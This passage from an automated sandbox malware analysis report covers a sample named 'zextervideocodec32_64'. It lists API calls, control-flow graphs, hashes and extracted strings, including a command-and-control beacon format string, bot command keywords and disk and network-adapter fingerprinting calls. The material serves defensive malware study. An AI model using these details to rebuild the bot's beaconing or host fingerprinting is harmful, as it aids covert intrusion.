                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC74AA
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC74B6
                                                                                                      • _memset.LIBCMT ref: 02BC74D0
                                                                                                      • _memset.LIBCMT ref: 02BC74DF
                                                                                                      • _memset.LIBCMT ref: 02BC74EF
                                                                                                      • _memset.LIBCMT ref: 02BC7502
                                                                                                      • _memset.LIBCMT ref: 02BC7518
                                                                                                      • _malloc.LIBCMT ref: 02BC758E
                                                                                                      • _memset.LIBCMT ref: 02BC759F
                                                                                                      • _strtok.LIBCMT ref: 02BC75BF
                                                                                                      • _swscanf.LIBCMT ref: 02BC75D6
                                                                                                      • _strtok.LIBCMT ref: 02BC75ED
                                                                                                      • _free.LIBCMT ref: 02BC75F9
                                                                                                      • Sleep.KERNEL32(000007D0), ref: 02BC76F1
                                                                                                      • _memset.LIBCMT ref: 02BC7765
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC7772
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC7784
                                                                                                      • _sprintf.LIBCMT ref: 02BC7822
                                                                                                      • RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC78E6
                                                                                                      • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC791A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
                                                                                                      • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
                                                                                                      • API String ID: 696907137-1839899575
                                                                                                      • Opcode ID: 2d27b03a93e7b4ab114be8047b231d55629b1b943bee7fe0ead52fce45f56d15
                                                                                                      • Instruction ID: 3b7e9d39b7e8cf01733a8db744d7fad7a0d187c51cd9902b06efd7051fcfef11
                                                                                                      • Opcode Fuzzy Hash: 2d27b03a93e7b4ab114be8047b231d55629b1b943bee7fe0ead52fce45f56d15
                                                                                                      • Instruction Fuzzy Hash: 8A3210315483819FE724AB24D804BABBBEAEFD5314F2448ADF58A87291EB709504CF53

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 481 2bc648b-2bc64ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 482 2bc64f3-2bc66f1 GetTickCount call 2bc605a GetVersionExA call 2bd4ad0 call 2bd2f8c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2bd4ad0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd2f8c * 4 QueryPerformanceCounter Sleep call 2bd2f8c * 2 call 2bd4ad0 * 2 481->482 483 2bc64ee call 2bc42c7 481->483 526 2bc66f4-2bc66f6 482->526 483->482 527 2bc66ff-2bc6701 526->527 528 2bc66f8-2bc66fd 526->528 530 2bc670e-2bc6742 RtlEnterCriticalSection RtlLeaveCriticalSection 527->530 531 2bc6703 527->531 529 2bc6708 Sleep 528->529 529->530 532 2bc6744-2bc6750 530->532 533 2bc6792 530->533 531->529 532->533 535 2bc6752-2bc675f 532->535 534 2bc6796-2bc72c3 InternetOpenA 533->534 540 2bc7389-2bc738f 534->540 541 2bc72c9-2bc7340 InternetSetOptionA * 3 call 2bd4ad0 InternetOpenUrlA 534->541 537 2bc6767-2bc6768 535->537 538 2bc6761-2bc6765 535->538 539 2bc676c-2bc6790 call 2bd4ad0 * 2 537->539 538->539 539->534 543 2bc73ab-2bc73b9 540->543 544 2bc7391-2bc7397 540->544 552 2bc7382-2bc7383 InternetCloseHandle 541->552 553 2bc7342 541->553 543->526 546 2bc73bf-2bc73e3 call 2bd4ad0 call 2bc439c 543->546 548 2bc739d-2bc73aa call 2bc53ec 544->548 549 2bc7399-2bc739b 544->549 546->526 564 2bc73e9-2bc7417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd231c 546->564 548->543 549->543 552->540 559 2bc7346-2bc736c InternetReadFile 553->559 561 2bc736e-2bc7375 559->561 562 2bc7377-2bc737e InternetCloseHandle 559->562 561->559 562->552 567 2bc746d-2bc7488 call 2bd231c 564->567 568 2bc7419-2bc742b call 2bd231c 564->568 573 2bc748e-2bc7490 567->573 574 2bc7742-2bc7754 call 2bd231c 567->574 568->567 575 2bc742d-2bc743f call 2bd231c 568->575 573->574 576 2bc7496-2bc7548 call 2bd2f8c RtlEnterCriticalSection RtlLeaveCriticalSection call 2bd4ad0 * 5 call 2bc439c * 2 573->576 584 2bc779d-2bc77af call 2bd231c 574->584 585 2bc7756-2bc7758 574->585 575->567 582 2bc7441-2bc7453 call 2bd231c 575->582 641 2bc754a-2bc754c 576->641 642 2bc7585 576->642 582->567 594 2bc7455-2bc7467 call 2bd231c 582->594 595 2bc77d0-2bc77e2 call 2bd231c 584->595 596 2bc77b1-2bc77bf call 2bc61f5 call 2bc6303 584->596 585->584 589 2bc775a-2bc7798 call 2bd4ad0 RtlEnterCriticalSection RtlLeaveCriticalSection 585->589 589->526 594->526 594->567 609 2bc77e8-2bc77ea 595->609 610 2bc7b00-2bc7b12 call 2bd231c 595->610 612 2bc77c4-2bc77cb call 2bc640e 596->612 609->610 614 2bc77f0-2bc7807 call 2bc439c 609->614 610->526 622 2bc7b18-2bc7b46 call 2bd2f8c call 2bd4ad0 call 2bc439c 610->622 612->526 614->526 623 2bc780d-2bc78db call 2bd23f8 call 2bc1ba7 614->623 643 2bc7b4f-2bc7b56 call 2bd2f54 622->643 644 2bc7b48-2bc7b4a call 2bc534d 622->644 639 2bc78dd call 2bc143f 623->639 640 2bc78e2-2bc7903 RtlEnterCriticalSection 623->640 639->640 647 2bc790f-2bc7973 RtlLeaveCriticalSection call 2bc3c67 call 2bc3d7e call 2bc8311 640->647 648 2bc7905-2bc790c 640->648 641->642 649 2bc754e-2bc7560 call 2bd231c 641->649 645 2bc7589-2bc75b7 call 2bd2f8c call 2bd4ad0 call 2bc439c 642->645 643->526 644->643 672 2bc75f8-2bc7601 call 2bd2f54 645->672 673 2bc75b9-2bc75c8 call 2bd35c6 645->673 670 2bc7979-2bc79c1 call 2bca6fb 647->670 671 2bc7ae7-2bc7afb call 2bc8fd9 647->671 648->647 649->642 661 2bc7562-2bc7583 call 2bc439c 649->661 661->645 682 2bc79c7-2bc79ce 670->682 683 2bc7ab1-2bc7ae2 call 2bc83c0 call 2bc33b2 670->683 671->526 684 2bc7738-2bc773b 672->684 685 2bc7607-2bc761f call 2bd3b2c 672->685 673->672 686 2bc75ca 673->686 688 2bc79d1-2bc79d6 682->688 683->671 684->574 698 2bc762b 685->698 699 2bc7621-2bc7629 call 2bc970d 685->699 690 2bc75cf-2bc75e1 call 2bd2830 686->690 688->688 692 2bc79d8-2bc7a23 call 2bca6fb 688->692 700 2bc75e6-2bc75f6 call 2bd35c6 690->700 701 2bc75e3 690->701 692->683 707 2bc7a29-2bc7a2f 692->707 704 2bc762d-2bc76cf call 2bca825 call 2bc3863 call 2bc5119 call 2bc3863 call 2bcaacb call 2bcabe5 698->704 699->704 700->672 700->690 701->700 727 2bc76d4-2bc76e5 704->727 711 2bc7a32-2bc7a37 707->711 711->711 713 2bc7a39-2bc7a74 call 2bca6fb 711->713 713->683 719 2bc7a76-2bc7aaa call 2bcd0ed 713->719 722 2bc7aaf-2bc7ab0 719->722 722->683 728 2bc76ec-2bc7717 Sleep call 2bd18d0 727->728 729 2bc76e7 call 2bc380b 727->729 733 2bc7719-2bc7722 call 2bc4100 728->733 734 2bc7723-2bc7731 728->734 729->728 733->734 734->684 736 2bc7733 call 2bc380b 734->736 736->684
                                                                                                      APIs
                                                                                                      • RtlInitializeCriticalSection.NTDLL(02BF71E0), ref: 02BC64BA
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02BC64D1
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BC64DA
                                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02BC64E9
                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 02BC64EC
                                                                                                      • GetTickCount.KERNEL32 ref: 02BC64F8
                                                                                                        • Part of subcall function 02BC605A: _malloc.LIBCMT ref: 02BC6068
                                                                                                      • GetVersionExA.KERNEL32(02BF7038), ref: 02BC6525
                                                                                                      • _memset.LIBCMT ref: 02BC6544
                                                                                                      • _malloc.LIBCMT ref: 02BC6551
                                                                                                        • Part of subcall function 02BD2F8C: __FF_MSGBANNER.LIBCMT ref: 02BD2FA3
                                                                                                        • Part of subcall function 02BD2F8C: __NMSG_WRITE.LIBCMT ref: 02BD2FAA
                                                                                                        • Part of subcall function 02BD2F8C: RtlAllocateHeap.NTDLL(007C0000,00000000,00000001), ref: 02BD2FCF
                                                                                                      • _malloc.LIBCMT ref: 02BC6561
                                                                                                      • _malloc.LIBCMT ref: 02BC656C
                                                                                                      • _malloc.LIBCMT ref: 02BC6577
                                                                                                      • _malloc.LIBCMT ref: 02BC6582
                                                                                                      • _malloc.LIBCMT ref: 02BC658D
                                                                                                      • _malloc.LIBCMT ref: 02BC6598
                                                                                                      • _malloc.LIBCMT ref: 02BC65A7
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02BC65BE
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC65C7
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC65D6
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC65D9
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02BC65E4
                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02BC65E7
                                                                                                      • _memset.LIBCMT ref: 02BC65FA
                                                                                                      • _memset.LIBCMT ref: 02BC6606
                                                                                                      • _memset.LIBCMT ref: 02BC6613
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC6621
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC662E
                                                                                                      • _malloc.LIBCMT ref: 02BC6652
                                                                                                      • _malloc.LIBCMT ref: 02BC6660
                                                                                                      • _malloc.LIBCMT ref: 02BC6667
                                                                                                      • _malloc.LIBCMT ref: 02BC668D
                                                                                                      • QueryPerformanceCounter.KERNEL32(00000200), ref: 02BC66A0
                                                                                                      • Sleep.KERNELBASE ref: 02BC66AE
                                                                                                      • _malloc.LIBCMT ref: 02BC66BA
                                                                                                      • _malloc.LIBCMT ref: 02BC66C7
                                                                                                      • _memset.LIBCMT ref: 02BC66DC
                                                                                                      • _memset.LIBCMT ref: 02BC66EC
                                                                                                      • Sleep.KERNELBASE(0000EA60), ref: 02BC6708
                                                                                                      • RtlEnterCriticalSection.NTDLL(02BF71E0), ref: 02BC6713
                                                                                                      • RtlLeaveCriticalSection.NTDLL(02BF71E0), ref: 02BC6724
                                                                                                      • _memset.LIBCMT ref: 02BC6779
                                                                                                      • _memset.LIBCMT ref: 02BC6788
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                                      • API String ID: 2251652938-2678694477
                                                                                                      • Opcode ID: 9cb803cb778f7f4de2c269beef88c2996a02dde96f52c70be6ad3ba8291c4939
                                                                                                      • Instruction ID: 4b7b005d88279883161126a7737e94223e8633d8993c9d93be0fd0e5c3cd2134
                                                                                                      • Opcode Fuzzy Hash: 9cb803cb778f7f4de2c269beef88c2996a02dde96f52c70be6ad3ba8291c4939
                                                                                                      • Instruction Fuzzy Hash: 5171A4B1D483509FE7106F309C45B5BFBE9AF85350F100CAEF9859B281EBB49850DBA6

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1250 401b4b-401b68 LoadLibraryA 1251 401c21-401c25 1250->1251 1252 401b6e-401b7f GetProcAddress 1250->1252 1253 401b85-401b8e 1252->1253 1254 401c18-401c1b FreeLibrary 1252->1254 1255 401b95-401ba5 GetAdaptersInfo 1253->1255 1254->1251 1256 401ba7-401bb0 1255->1256 1257 401bdb-401be3 1255->1257 1260 401bc1-401bd7 call 402cc0 call 4018cc 1256->1260 1261 401bb2-401bb6 1256->1261 1258 401be5-401beb call 402ca6 1257->1258 1259 401bec-401bf0 1257->1259 1258->1259 1264 401bf2-401bf6 1259->1264 1265 401c15-401c17 1259->1265 1260->1257 1261->1257 1266 401bb8-401bbf 1261->1266 1264->1265 1269 401bf8-401bfb 1264->1269 1265->1254 1266->1260 1266->1261 1271 401c06-401c13 call 402c98 1269->1271 1272 401bfd-401c03 1269->1272 1271->1255 1271->1265 1272->1271
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                                      • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                                      • API String ID: 514930453-3667123677
                                                                                                      • Opcode ID: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                                                                      • Instruction ID: 38440359ad4724572ca0372a4bc8090c683b298b5ffde01d95b1867a6a9b844d
                                                                                                      • Opcode Fuzzy Hash: b984b7dde6bf878e61bd9d6389ae28c16a21e2d2acce5cac07de2378b9438879
                                                                                                      • Instruction Fuzzy Hash: F921B870904109AFEF119F65C9447EF7BB8EF41344F1440BAD504B22E1E7789985CB69

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1324 2bcf97d-2bcf9a0 LoadLibraryA 1325 2bcf9a6-2bcf9b4 GetProcAddress 1324->1325 1326 2bcfa60-2bcfa67 1324->1326 1327 2bcfa59-2bcfa5a FreeLibrary 1325->1327 1328 2bcf9ba-2bcf9ca 1325->1328 1327->1326 1329 2bcf9cc-2bcf9d8 GetAdaptersInfo 1328->1329 1330 2bcf9da 1329->1330 1331 2bcfa10-2bcfa18 1329->1331 1334 2bcf9dc-2bcf9e3 1330->1334 1332 2bcfa1a-2bcfa20 call 2bd3788 1331->1332 1333 2bcfa21-2bcfa26 1331->1333 1332->1333 1336 2bcfa28-2bcfa2b 1333->1336 1337 2bcfa54-2bcfa58 1333->1337 1338 2bcf9ed-2bcf9f5 1334->1338 1339 2bcf9e5-2bcf9e9 1334->1339 1336->1337 1341 2bcfa2d-2bcfa32 1336->1341 1337->1327 1343 2bcf9f8-2bcf9fd 1338->1343 1339->1334 1342 2bcf9eb 1339->1342 1344 2bcfa3f-2bcfa4a call 2bd3b2c 1341->1344 1345 2bcfa34-2bcfa3c 1341->1345 1342->1331 1343->1343 1346 2bcf9ff-2bcfa0c call 2bcf6cc 1343->1346 1344->1337 1351 2bcfa4c-2bcfa4f 1344->1351 1345->1344 1346->1331 1351->1329
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02BCF993
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02BCF9AC
                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 02BCF9D1
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 02BCFA5A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                                      • API String ID: 514930453-3114217049
                                                                                                      • Opcode ID: fa7ec21407ddee2bdd98b0236ec8416015dbd008f986d4abc5f0b798fd853508
                                                                                                      • Instruction ID: 3a70f35fcb6302baa4ce6acf782b3e0804b99bf06405004a037c0904b0067281
                                                                                                      • Opcode Fuzzy Hash: fa7ec21407ddee2bdd98b0236ec8416015dbd008f986d4abc5f0b798fd853508
                                                                                                      • Instruction Fuzzy Hash: DE219E75A00209ABDF14DBA898806FEFBBAEF05314F2440EFE955E7611DB709945CBA0

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1409 2bcf879-2bcf8a4 CreateFileA 1410 2bcf8aa-2bcf8bf 1409->1410 1411 2bcf975-2bcf97c 1409->1411 1412 2bcf8c2-2bcf8e4 DeviceIoControl 1410->1412 1413 2bcf91d-2bcf925 1412->1413 1414 2bcf8e6-2bcf8ee 1412->1414 1417 2bcf92e-2bcf930 1413->1417 1418 2bcf927-2bcf92d call 2bd3788 1413->1418 1415 2bcf8f7-2bcf8fc 1414->1415 1416 2bcf8f0-2bcf8f5 1414->1416 1415->1413 1421 2bcf8fe-2bcf906 1415->1421 1416->1413 1419 2bcf96b-2bcf974 CloseHandle 1417->1419 1420 2bcf932-2bcf935 1417->1420 1418->1417 1419->1411 1423 2bcf937-2bcf940 GetLastError 1420->1423 1424 2bcf951-2bcf95e call 2bd3b2c 1420->1424 1425 2bcf909-2bcf90e 1421->1425 1423->1419 1427 2bcf942-2bcf945 1423->1427 1424->1419 1433 2bcf960-2bcf966 1424->1433 1425->1425 1429 2bcf910-2bcf91c call 2bcf6cc 1425->1429 1427->1424 1430 2bcf947-2bcf94e 1427->1430 1429->1413 1430->1424 1433->1412
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02BCF898
                                                                                                      • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02BCF8D6
                                                                                                      • GetLastError.KERNEL32 ref: 02BCF937
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 02BCF96E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                                      • API String ID: 4026078076-1180397377
                                                                                                      • Opcode ID: 7314b262c9ce4fceb271d13f51334884a8dafa86fdee11678af3076091a3bbba
                                                                                                      • Instruction ID: 8331c8ed8f866c170dce7db4deecd9e5a266aef7d8825cbe7f1c7014d0c0408c
                                                                                                      • Opcode Fuzzy Hash: 7314b262c9ce4fceb271d13f51334884a8dafa86fdee11678af3076091a3bbba
                                                                                                      • Instruction Fuzzy Hash: A4318171D00219FBDF18DF95D884ABEBBBAEB05754F2041EFE605A7641D7B09A01CB90

Control-flow Graph

APIs
• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
• DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
• GetLastError.KERNEL32 ref: 00401B0E
• CloseHandle.KERNELBASE(?), ref: 00401B3D
Memory Dump Source
• Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID: CloseControlCreateDeviceErrorFileHandleLast
• String ID: \\.\PhysicalDrive0
• API String ID: 4026078076-1180397377
• Opcode ID: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
• Instruction ID: fc4aaa1cf60edb7db06fdbd05dea25136cd7d186831ecbc7bbbcf924abbffa34
• Opcode Fuzzy Hash: 3afb43cc3dedd2849d90584800b0b4b1cc754ecdd9339dbac4238ad8ee4012bf
• Instruction Fuzzy Hash: 74318B71D00218EADB21AFA5CD849EFBBB9FF41750F20407AE554B32A0E7785E45CB98
APIs
• lstrcmpiW.KERNELBASE ref: 00402199
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040D15A
• lstrcmpiW.KERNEL32(?,0040915C), ref: 0040D764
Memory Dump Source
• Source File: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID: lstrcmpi$CtrlDispatcherServiceStart
• String ID: test
• API String ID: 2172614945-3632233996
• Opcode ID: 5ae61f63a8e06413efbf1cbc6131c1c7aae20cf67e079e7d3b8cd5e39f076596
• Instruction ID: e6d18fb5675363f103dcfed14c989fe5127fa8abfa2e43cfdb745462f06fff5f
• Opcode Fuzzy Hash: 5ae61f63a8e06413efbf1cbc6131c1c7aae20cf67e079e7d3b8cd5e39f076596
• Instruction Fuzzy Hash: 0FF068B4E08201EAEB106FB19E4C67E7754BB09301B30847BA447B11D1CB7C450E6A9F

Memory Dump Source
• Source File: 00000003.00000002.3287527666.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3287527666.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_zextervideocodec32_64.jbxd
Similarity
• API ID:
• String ID: /chk
• API String ID: 0-3837807730
• Opcode ID: 29d1cf7ffd5baad62fb2cddb07dcb7a5a4ece1c976db70669faed20f2cdf337e
• Instruction ID: 025942cb242d3d5260985c598898fe5e06497644a84d452e8f5b1ec8b5760f88
• Opcode Fuzzy Hash: 29d1cf7ffd5baad62fb2cddb07dcb7a5a4ece1c976db70669faed20f2cdf337e
• Instruction Fuzzy Hash: 8901DCB6C1C902E5E7114AD44D8A8BB2B6CE80A30C7244433D287BA4C3DA7C944F914E

Control-flow Graph

Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Similarity
• API ID:
• String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
• API String ID: 0-2678694477
• Opcode ID: c9af72704825232933f22a183982c931f40f7c98fc8c2f8a605d1a74fb11f001
• Instruction ID: 7d41fb11bbc7e49bdfe71ebbb0675d7a3643f7d7115855fe44d07f87c1fc6b98
• Opcode Fuzzy Hash: c9af72704825232933f22a183982c931f40f7c98fc8c2f8a605d1a74fb11f001
• Instruction Fuzzy Hash: 6981E5B1D483409FE714AF349C05B9BFBE9AF85350F100CAEF9859B242EB749854CB96

Control-flow Graph

Strings
• strcat, xrefs: 02BC64DC
• ntdll.dll, xrefs: 02BC64E1
• Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02BC6739
• cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02BC666F
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Similarity
• API ID:
• String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$strcat
• API String ID: 0-3302467957
• Opcode ID: da55eba371371ebca3731c2f40268c40469857407aba1bcab9f61610ed6fc365
• Instruction ID: 37eee3021bb3047deb74c2397c19a1d51688f25a4dc41e2bdd0ead3b6a2c39e4
• Opcode Fuzzy Hash: da55eba371371ebca3731c2f40268c40469857407aba1bcab9f61610ed6fc365
• Instruction Fuzzy Hash: 0EA128B1D083909FD314AF349C05B9BFBE5EF85310F1008AEF9849B252EB749815CBA6

Control-flow Graph

APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D11
• GetLastError.KERNEL32 ref: 02BC1D23
  • Part of subcall function 02BC1712: __EH_prolog.LIBCMT ref: 02BC1717
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02BC1D59
• GetLastError.KERNEL32 ref: 02BC1D6B
• __beginthreadex.LIBCMT ref: 02BC1DB1
• GetLastError.KERNEL32 ref: 02BC1DC6
• CloseHandle.KERNEL32(00000000), ref: 02BC1DDD
• CloseHandle.KERNEL32(00000000), ref: 02BC1DEC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BC1E14
• CloseHandle.KERNELBASE(00000000), ref: 02BC1E1B
Memory Dump Source
• Source File: 00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2bc1000_zextervideocodec32_64.jbxd
Similarity
• API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
• String ID: thread$thread.entry_event$thread.exit_event
• API String ID: 831262434-3017686385
• Opcode ID: e0237b752cf0cd3ed1e94973df4898981a7e4dfb6e62faf0621b2084f70f545d
• Instruction ID: c3e9605aabd4fec92ffa7613ba704b6f1d882026e854eca2cd654dad865b1047
• Opcode Fuzzy Hash: e0237b752cf0cd3ed1e94973df4898981a7e4dfb6e62faf0621b2084f70f545d
• Instruction Fuzzy Hash: 703170719003019FDB00EF24C888B6BBBE5EF84754F2049ADF959DB292DB709949CF92

                                                                                                      Control-flow Graph (rendered in the original report with executed / not-executed node colouring; entry block 2bc4603-2bc463b, exit via 2bc4b5a-2bc4b76)
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 02BC4608
                                                                                                        • Part of subcall function 02BD3B2C: _malloc.LIBCMT ref: 02BD3B44
                                                                                                      • htons.WS2_32(?), ref: 02BC4669
                                                                                                      • htonl.WS2_32(?), ref: 02BC468C
                                                                                                      • htonl.WS2_32(00000000), ref: 02BC4693
                                                                                                      • htons.WS2_32(00000000), ref: 02BC4747
                                                                                                      • _sprintf.LIBCMT ref: 02BC475D
                                                                                                        • Part of subcall function 02BC8962: _memmove.LIBCMT ref: 02BC8982
                                                                                                      • htons.WS2_32(?), ref: 02BC46B0
                                                                                                        • Part of subcall function 02BC970D: __EH_prolog.LIBCMT ref: 02BC9712
                                                                                                        • Part of subcall function 02BC970D: RtlEnterCriticalSection.NTDLL(00000020), ref: 02BC978D
                                                                                                        • Part of subcall function 02BC970D: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02BC97AB
                                                                                                        • Part of subcall function 02BC1BA7: __EH_prolog.LIBCMT ref: 02BC1BAC
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1BBC
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1BEA
                                                                                                        • Part of subcall function 02BC1BA7: RtlEnterCriticalSection.NTDLL ref: 02BC1C13
                                                                                                        • Part of subcall function 02BC1BA7: RtlLeaveCriticalSection.NTDLL ref: 02BC1C56
                                                                                                        • Part of subcall function 02BCDEC9: __EH_prolog.LIBCMT ref: 02BCDECE
